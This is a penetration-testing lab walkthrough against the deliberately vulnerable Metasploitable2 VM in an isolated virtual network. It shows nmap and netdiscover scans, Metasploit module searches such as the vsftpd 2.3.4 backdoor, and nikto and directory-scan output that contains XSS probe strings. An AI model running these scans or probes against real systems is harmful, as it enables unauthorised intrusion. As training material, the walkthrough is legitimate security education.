Metasploitable2 Walkthrough


For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases.

Set-up

This metasploitable walk-through is performed in a virtual lab environment. Two virtual machines (VMs) are used. The first is a Kali VM and the second is the Metasploitable2 VM. Both VMs have their network interfaces connected to an internal Virtualbox network called vlabnet. There is a DHCP server on the virtual lab network to dynamically allocate IP addresses to hosts.

The following command may be used to setup the DHCP server. VBoxManage dhcpserver add --netname vlabnet --ip 10.10.10.1 --netmask 255.255.255.0 --lowerip 10.10.10.100 --upperip 10.10.10.149 --enable

To verify that the DHCP server is available for the internal network, run VBoxManage.exe list dhcpservers, which should list the DHCP servers available for the respective networks.

So the walk-through is just me pretending to apply some arbitraty penetration testing approaches to the Metasploitable2 VM.

Also to make it easier to copy and mast between the Kali VM and the host machine to run Internet searched, it may be useful to install Virtualbox Guest Additions and share the clipboard.

apt-get autoremove --purge
apt-get update
apt-get dist-upgrade
reboot
apt-get update
apt-get install -y virtualbox-guest-x11
reboot

Metasploitable2

Download the current version of metasploitable 2 from the repository https://sourceforge.net/projects/metasploitable/. Extract the archive and locate the contents of the Metasploitable2-Linux directory. We will need these files to create a virtual machine within VirtualBox.

Create a new virtual machine in VirtualBox. You can review the contents of the .vmx file to get the system specification, but I have summarised below for reference.

VM: Metasploitable2-Linux
OS: Ubuntu
CPU:  1 (max: 4)
RAM:  512MB
eth0: 00:0C:29:FA:DD:2A (nat)
eth1: 00:0C:29:FA:DD:34 (host only)
Desc: This is Metasploitable2 (Linux)|0A|0AMetasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. |0A|0AThe default login and password is msfadmin:msfadmin. |0A|0ANever expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means). |0A|0ATo contact the developers, please send email to [email protected]|0A|0A

I disconnected the second interface (eth1), and connected the first interface (eth0) to an internal network (intnet).

Preparation

First, attempt to identify the target. We use the netdiscover utility to identify the hosts on the network. Since the eth1 interface on the Kali VM is connected to the vlannet, and we know that the subnet for that interface is 10.10.10.0/24, we can run the following command

root@kali:~# netdiscover -i eth1 -r 10.10.10.0/24 -P
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.10.10.1      08:00:27:ed:13:e7      1      60  PCS Systemtechnik GmbH
 10.10.10.101    00:0c:29:fa:dd:2a      1      60  VMware, Inc.

-- Active scan completed, 2 Hosts found.
root@kali:~# 

Since we used the -P switch netdiscover produces a parsable output. We can thus grep this to only get IP addresses, e.g. netdiscover -i eth1 -r 10.10.10.0/24 -P | grep -o -E '([0-9]{1,3}\.){3}[0-9]{1,3}'. From the output we can identify two hosts. We know that 10.10.10.1 is the DHCP server, so the other IP must belong to the target, i.e. the Metasploitable2 host. We can further refine the command to exclude the DHCP server, e.g. netdiscover -i eth1 -r 10.10.10.0/24 -P | grep -o -E '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v -E '10\.10\.10\.1$'. We can now proceed further to identify services running on that host using a port scanner such as nmap.

The previous command does not have to be processed so much, but it does provide an output that can be used in scripts in future. Next we scan all ports on the target host using the command nmap -Pn -n -sV -vv -p1-65535 --open 10.10.10.101. We get a result listing all open ports and the service versions.

root@kali:~# nmap -Pn -n -sV -vv -p1-65535 --open 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-27 10:38 EDT
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:38
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 10:38, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:38
Scanning 10.10.10.101 [65535 ports]
Discovered open port 80/tcp on 10.10.10.101
Discovered open port 25/tcp on 10.10.10.101
Discovered open port 23/tcp on 10.10.10.101
Discovered open port 139/tcp on 10.10.10.101
Discovered open port 22/tcp on 10.10.10.101
Discovered open port 5900/tcp on 10.10.10.101
Discovered open port 445/tcp on 10.10.10.101
Discovered open port 111/tcp on 10.10.10.101
Discovered open port 53/tcp on 10.10.10.101
Discovered open port 3306/tcp on 10.10.10.101
Discovered open port 21/tcp on 10.10.10.101
Discovered open port 2121/tcp on 10.10.10.101
Discovered open port 51622/tcp on 10.10.10.101
Discovered open port 47474/tcp on 10.10.10.101
Discovered open port 6697/tcp on 10.10.10.101
Discovered open port 34009/tcp on 10.10.10.101
Discovered open port 8180/tcp on 10.10.10.101
Discovered open port 514/tcp on 10.10.10.101
Discovered open port 6667/tcp on 10.10.10.101
Discovered open port 513/tcp on 10.10.10.101
Discovered open port 8009/tcp on 10.10.10.101
Discovered open port 3632/tcp on 10.10.10.101
Discovered open port 8787/tcp on 10.10.10.101
Discovered open port 35709/tcp on 10.10.10.101
Discovered open port 512/tcp on 10.10.10.101
Discovered open port 6000/tcp on 10.10.10.101
Discovered open port 5432/tcp on 10.10.10.101
Discovered open port 1099/tcp on 10.10.10.101
Discovered open port 2049/tcp on 10.10.10.101
Completed SYN Stealth Scan at 10:39, 7.93s elapsed (65535 total ports)
Initiating Service scan at 10:39
Scanning 30 services on 10.10.10.101
Completed Service scan at 10:41, 121.45s elapsed (30 services on 1 host)
NSE: Script scanning 10.10.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:41
Completed NSE at 10:41, 0.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:41
Completed NSE at 10:41, 0.07s elapsed
Nmap scan report for 10.10.10.101
Host is up, received arp-response (0.00052s latency).
Scanned at 2018-07-27 10:38:59 EDT for 130s
Not shown: 65505 closed ports
Reason: 65505 resets
PORT      STATE SERVICE     REASON         VERSION
21/tcp    open  ftp         syn-ack ttl 64 vsftpd 2.3.4
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      syn-ack ttl 64 Linux telnetd
25/tcp    open  smtp        syn-ack ttl 64 Postfix smtpd
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.4.2
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     syn-ack ttl 64 2 (RPC #100000)
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        syn-ack ttl 64 netkit-rsh rexecd
513/tcp   open  login       syn-ack ttl 64
514/tcp   open  shell       syn-ack ttl 64 Netkit rshd
1099/tcp  open  rmiregistry syn-ack ttl 64 GNU Classpath grmiregistry
2049/tcp  open  nfs         syn-ack ttl 64 2-4 (RPC #100003)
2121/tcp  open  ftp         syn-ack ttl 64 ProFTPD 1.3.1
3306/tcp  open  mysql       syn-ack ttl 64 MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     syn-ack ttl 64 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  syn-ack ttl 64 PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         syn-ack ttl 64 VNC (protocol 3.3)
6000/tcp  open  X11         syn-ack ttl 64 (access denied)
6667/tcp  open  irc         syn-ack ttl 64 UnrealIRCd
6697/tcp  open  irc         syn-ack ttl 64 UnrealIRCd
8009/tcp  open  ajp13       syn-ack ttl 64 Apache Jserv (Protocol v1.3)
8180/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         syn-ack ttl 64 Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34009/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
35709/tcp open  rmiregistry syn-ack ttl 64 GNU Classpath grmiregistry
47474/tcp open  mountd      syn-ack ttl 64 1-3 (RPC #100005)
51622/tcp open  nlockmgr    syn-ack ttl 64 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.77 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.622MB)
root@kali:~# 

The remainder of the walk-through just works through exploiting each of the service(s) related witht he open ports. To start the Metasploit console issue the msfconsole command. However, we need to conver off some important metasploit features:

Metasploit Database

Although it’s not required, it is pretty useful to store details from metasploit into a database for ease of access and to make results persistent so that session continuity can be maintained. Firstly create a Postgres database and user to be used by the Metasploit framework. In the example below we create a user called msf_user and a database called msf_database.

# systemctl start postgresql
# su postgres
$ createuser --interactive msf_user -P
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database
$ exit

Once the database has been created, start the Metasploit console and connect to the database using the details from the previous step. Once connected use the db_status command to verify connectivity to the database

db_connect msf_user:[PASSWORD]@127.0.0.1:5432/msf_database

There a a number of commands which make things a bit easier to manager from within the metasploit console, such as db_nmap for nmap scans and storing results in the database. For a full list of commands issue the help database command to see whats available.

Metasploit Workspaces

Once in the Metasploit msfconsole, Metasploit workspaces allow for logical separation of hosts and related data. This is useful for managing multiple projects and/or engagements. For this example we create a workspace called ‘metasploitable2’ using the workspace -a metasploitable2

Reconaisane

After setting up the database and a separate workspace for the walk-through we work within the msfconsole to performance reconaisance on the target. Firstly we attempt to identify the services running on the target, so we use the db_nmap command. db_nmap -A -p1-65535 -vv 10.10.10.101. The command populates the services versions which may be queried using the services command.

Now we know all the open ports on the target Metasploitable 2 host, as well as the versions of the services running based on the nmap scan, we can proceed to the next phase to identifiy vulnerabilities in the services

I like using exploitdb (https://www.exploit-db.com/) for identifying vulnerabilities, this is available on the command line in Kali using searchsploit. However to get more details on the vulnerabilities and exploits it may be useful to have the full writeups available via the associated papers (see, https://github.com/offensive-security/exploit-database-papers). This can be using using the following command, however you should note that its approximately a 2GB download.

apt-get install -y exploitdb-papers

Threat Modelling and Vulnerability Identification

Vulnerability identification is pretty simple with metasploit. We can search for known exploits based on the service details. For this section, we essentially iterate through the list of active services and search for known exploits or vulnerabilities. For the purposes of prevenity we don’t show each service vulnerability identification.

Port 21

msf > search vsftpd 2.3.4

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   auxiliary/gather/teamtalk_creds                        normal     TeamTalk Gather Credentials
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > info exploit/unix/ftp/vsftpd_234_backdoor

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03
<snip>

Port 22

Could not find anything specific to the version of openssh within Metasploit, so searched for CVEs regarding this. Found https://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/version_id-169731/Openbsd-Openssh-4.7p1.html, but nothing for which I could find an exploit at this stage.

Kept searching for vunerabilities and exploits against SSH and came across https://github.com/g0tmi1k/debian-ssh

Port 25

msf > db_nmap -A -p 25 10.10.10.101
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 13:12 EDT
[*] Nmap: Nmap scan report for 10.10.10.101
[*] Nmap: Host is up (0.00087s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 25/tcp open  smtp    Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2018-07-28T17:26:53+00:00; +14m31s from scanner time.
[*] Nmap: | sslv2:
[*] Nmap: |   SSLv2 supported
[*] Nmap: |   ciphers:
[*] Nmap: |     SSL2_RC4_128_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_RC4_128_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_DES_192_EDE3_CBC_WITH_MD5
[*] Nmap: |_    SSL2_DES_64_CBC_WITH_MD5
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host:  metasploitable.localdomain
[*] Nmap: Host script results:
[*] Nmap: |_clock-skew: mean: 14m30s, deviation: 0s, median: 14m30s
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.87 ms 10.10.10.101
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 16.28 seconds
msf > 

From the nmap scan we can see that the VRFY SMTP method is supported. We can exploit this to enumerate the users. See https://cr.yp.to/smtp/vrfy.html. We append the users into our users file called msfusers.txt

Port 53

Searched for vulnerabilities affecting bind 9.4.2, found https://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-51374/ISC-Bind-9.4.2.html.

Port 80

msf > db_nmap -A -p 80 10.10.10.101
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 15:55 EDT
[*] Nmap: Nmap scan report for 10.10.10.101
[*] Nmap: Host is up (0.00078s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.78 ms 10.10.10.101
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
msf > use auxiliary/scanner/http/dir_listing
msf auxiliary(scanner/http/dir_listing) > show options

Module options (auxiliary/scanner/http/dir_listing):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The path to identify directoy listing
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  256              yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(scanner/http/dir_listing) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/dir_scanner 
msf auxiliary(scanner/http/dir_scanner) > show options

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.101/32                                          yes       The target address range or CIDR identifier
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                                                      yes       The number of concurrent threads
   VHOST                                                                no        HTTP server virtual host

msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.101
[+] Found http://10.10.10.101:80/cgi-bin/ 404 (10.10.10.101)
[+] Found http://10.10.10.101:80/doc/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/icons/ 404 (10.10.10.101)
[+] Found http://10.10.10.101:80/index/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/phpMyAdmin/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/test/ 404 (10.10.10.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > use auxiliary/scanner/http/files_dir
msf auxiliary(scanner/http/files_dir) > show options

Module options (auxiliary/scanner/http/files_dir):

   Name        Current Setting                                           Required  Description
   ----        ---------------                                           --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_files.txt  no        Path of word dictionary to use
   EXT                                                                   no        Append file extension to use
   PATH        /                                                         yes       The path  to identify files
   Proxies                                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.101/32                                           yes       The target address range or CIDR identifier
   RPORT       80                                                        yes       The target port (TCP)
   SSL         false                                                     no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                                                       yes       The number of concurrent threads
   VHOST                                                                 no        HTTP server virtual host

msf auxiliary(scanner/http/files_dir) > run

[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[+] Found http://10.10.10.101:80/index.php 200
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.101:80/dav 301
[+] Found http://10.10.10.101:80/index 200
[+] Found http://10.10.10.101:80/phpMyAdmin 301
[+] Found http://10.10.10.101:80/test 301
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.101:80/dav 301
[+] Found http://10.10.10.101:80/index 200
[+] Found http://10.10.10.101:80/phpMyAdmin 301
[+] Found http://10.10.10.101:80/test 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/files_dir) > use auxiliary/scanner/http/robots_txt 
msf auxiliary(scanner/http/robots_txt) > show options

Module options (auxiliary/scanner/http/robots_txt):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The test path to find robots.txt file
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  256              yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(scanner/http/robots_txt) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/robots_txt) >

Based on the recon, we have found the following URLs

  • http://10.10.10.101:80/cgi-bin/
  • http://10.10.10.101:80/dav
  • http://10.10.10.101:80/doc/
  • http://10.10.10.101:80/icons/
  • http://10.10.10.101:80/index/
  • http://10.10.10.101:80/phpMyAdmin/
  • http://10.10.10.101:80/test/

Searched online for CVE relating to Apache 2.2.8 and found https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/Apache-Http-Server-2.2.8.html and https://httpd.apache.org/security/vulnerabilities_22.html. Decided to run another vulnerability scan using nikto

root@kali:~# nikto -h 10.10.10.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.101
+ Target Hostname:    10.10.10.101
+ Target Port:        80
+ Start Time:         2018-07-28 18:01:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=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